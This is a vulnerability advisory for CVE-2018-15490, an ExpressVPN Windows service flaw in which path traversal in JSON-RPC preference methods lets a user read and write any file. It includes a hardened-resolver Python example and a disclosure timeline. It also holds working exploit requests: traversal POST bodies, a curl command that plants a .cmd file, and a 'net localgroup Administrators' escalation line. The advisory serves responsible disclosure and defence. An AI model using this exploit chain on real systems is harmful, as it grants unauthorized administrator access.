CVE-2018-15490 ExpressVPN local privilege escalation

Two vulnerabilities exist in the xvpnd.exe process that allow a non-privileged user to read and write files on the file system on behalf of the xvpnd.exe process. This can be exploited for local privilege escalation.

The xvpnd.exe process (which runs as a service with SYSTEM privileges) listens on TCP port 2015, which is used as the RPC interface for communication with the client side of the ExpressVPN application. JSON-RPC over HTTP is used for this communication. The JSON-RPC methods XVPN.GetPreference and XVPN.SetPreference are vulnerable to path traversal and allow reading and writing files on the file system.


Proof of concept

In order to make a JSON-RPC request, an access token is required. The access token is stored in the file C:\ProgramData\ExpressVPN\v4\access_token, which is readable by all authenticated users (see screenshot below).

The value of the key parameter of the XVPN.GetPreference method is treated as a filename and is vulnerable to path traversal. This allows reading any file on the file system with SYSTEM privileges. The following POST request demonstrates the issue:

POST /rpc HTTP/1.1
Accept: application/json, application/xml, text/json, text/x-json, text/javascript, text/xml
User-Agent: RestSharp/105.2.3.0
Content-Type: application/json
Host: localhost:2015
Content-Length: 171
Accept-Encoding: gzip, deflate

{"jsonrpc":"2.0","method":"XVPN.GetPreference","params":{"access_token":"ku8j6opcwv4uqzvwol8rgnh31x04nr24","key":"../../../../../../../../../../Windows/win.ini"},"id":"2"}

The application responds with the content of the file, base64-encoded.

The XVPN.SetPreference JSON-RPC method is vulnerable in a similar manner. It allows writing a file anywhere on the file system. The next request demonstrates how to create a file sectest.txt in the Windows folder via JSON-RPC.

POST /rpc HTTP/1.1
Accept: application/json, application/xml, text/json, text/x-json, text/javascript, text/xml
User-Agent: RestSharp/105.2.3.0
Content-Type: application/json
Host: localhost:2015
Content-Length: 206
Accept-Encoding: gzip, deflate

{"jsonrpc":"2.0","method":"XVPN.SetPreference","params":{"access_token":"ku8j6opcwv4uqzvwol8rgnh31x04nr24","key":"../../../../../../../../../../Windows/sectest.txt","value":"test","type":"string"},"id":"2"}

The next screenshot shows that the file was created successfully.
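Both methods share the same root cause: the caller-supplied key is joined onto a directory and used as a path without canonicalizing the result and checking that it is still inside that directory. The following Python snippet is added here and is not part of the original advisory or of ExpressVPN's code; it models the flawed join next to a hardened resolver and runs the hardened check over a constructed copy of the request body above. The preference directory PREF_ROOT and the preference-name allow-list are assumptions, since the page does not describe the service's internals.

```python
import json
import ntpath
import re

# Assumption: where the preference store lives; the page gives only the token path.
PREF_ROOT = r"C:\ProgramData\ExpressVPN\v4\prefs"
# Allow-list for a preference name: alphanumeric start, no separators, so "." and ".." fail.
_KEY_RE = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}")


class PreferenceKeyError(ValueError):
    """Key would resolve outside PREF_ROOT."""


def resolve_vulnerable(key: str) -> str:
    """The flawed pattern: caller-supplied key joined straight onto the root, so
    '..' segments walk out of it. ntpath is used so this runs on any OS."""
    return ntpath.normpath(ntpath.join(PREF_ROOT, key))


def resolve_hardened(key: str) -> str:
    """Two independent layers: allow-list the key, then check that the canonical
    path is still inside PREF_ROOT (so loosening the regex later cannot reopen it)."""
    if not _KEY_RE.fullmatch(key):
        raise PreferenceKeyError(f"key rejected by allow-list: {key!r}")
    candidate = ntpath.normpath(ntpath.join(PREF_ROOT, key))
    try:
        inside = ntpath.normcase(ntpath.commonpath([PREF_ROOT, candidate])) == ntpath.normcase(PREF_ROOT)
    except ValueError:  # different drive or absolute key: never inside the root
        inside = False
    if not inside or ntpath.normcase(candidate) == ntpath.normcase(PREF_ROOT):
        raise PreferenceKeyError(f"key escapes preference root: {key!r}")
    return candidate


def validate_rpc_body(body: str) -> tuple:
    """Apply the hardened check to params.key of a JSON-RPC body as posted to /rpc.
    Returns (accepted, detail): detail is the resolved path or the rejection reason."""
    req = json.loads(body)
    if req.get("method") not in ("XVPN.GetPreference", "XVPN.SetPreference"):
        return True, "not a preference method"
    try:
        return True, resolve_hardened(req["params"]["key"])
    except (KeyError, TypeError, PreferenceKeyError) as exc:
        return False, str(exc)


# Constructed sample body with a placeholder token; the key mirrors the advisory's request.
SAMPLE_BODY = ('{"jsonrpc":"2.0","method":"XVPN.GetPreference","params":{"access_token":'
               '"<TOKEN-PLACEHOLDER>","key":"../../../../../../../../../../Windows/win.ini"},"id":"2"}')

if __name__ == "__main__":
    print("vulnerable resolves to:", resolve_vulnerable(json.loads(SAMPLE_BODY)["params"]["key"]))
    print("hardened verdict:", validate_rpc_body(SAMPLE_BODY))
```

The same check applied on the XVPN.SetPreference side turns the write primitive into a write confined to the preference directory, and the rejection reason gives an auditable event to log.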

There are many ways to escalate privileges on the Windows operating system once you can write files anywhere on the system. In this case the situation is slightly complicated, since the written content is enclosed in double quotes. Nevertheless, it is possible to create a .cmd file which calls another .cmd file containing additional commands. Additionally, the ExpressVPN xvpnd.exe process tries to open many non-existent files in the C:\Program Files\ExpressVPN\xvpnd folder after disconnecting from the VPN server. Procmon shows the xvpnd.exe process attempting to open these non-existent files.

One of these missing files can be created by abusing the described vulnerability, and it will then be executed by the xvpnd.exe process.

To summarize, the exploitation steps for privilege escalation are:

  1. Log in to Windows with a non-admin user.
  2. Launch the ExpressVPN application and connect to any VPN server.
  3. Create the file C:\Program Files\ExpressVPN\xvpnd\sc.cmd by issuing the following request to the JSON-RPC service:

curl -i -s -k -X $'POST' \
  -H $'Accept: application/json, application/xml, text/json, text/x-json, text/javascript, text/xml' \
  -H $'User-Agent: RestSharp/105.2.3.0' \
  -H $'Content-Type: application/json' \
  -H $'Host: localhost:2015' \
  -H $'Content-Length: 277' \
  -H $'Accept-Encoding: gzip, deflate' \
  --data-binary $'{\"jsonrpc\":\"2.0\",\"method\":\"XVPN.SetPreference\",\"params\":{\"access_token\":\"ku8j6opcwv4uqzvwol8rgnh31x04nr24\",\"key\":\"../../../../../../../../../../Program Files/ExpressVPN/xvpnd/sc.cmd\",\"value\":\"C:\\\\Users\\\\standard2\\\\AppData\\\\Local\\\\Temp\\\\exploit.cmd\",\"type\":\"string\"},\"id\":\"2\"}\x0d\x0a' \
  $'http://localhost:2015/rpc'

  4. Create the file C:\Users\standard2\AppData\Local\Temp\exploit.cmd with the following content:

net localgroup Administrators standard2 /add

  5. Disconnect from the VPN server. The file C:\Program Files\ExpressVPN\xvpnd\sc.cmd should then be executed, and the user standard2 should be added to the local Administrators group.

Tested version: ExpressVPN Windows application, version 6.6.2 (4493)


Disclosure Timeline:

June 24, 2018 — Vendor notified about vulnerability

June 25, 2018 — Vendor asked for additional details

June 25, 2018 — Additional details were provided

June 25, 2018 — Vendor acknowledged the vulnerability and informed that it would be patched in the next release. Asked to postpone the release of details for six months. Bounty awarded.

July 5, 2018 — Fixed version of ExpressVPN released

December 31, 2018 — Public disclosure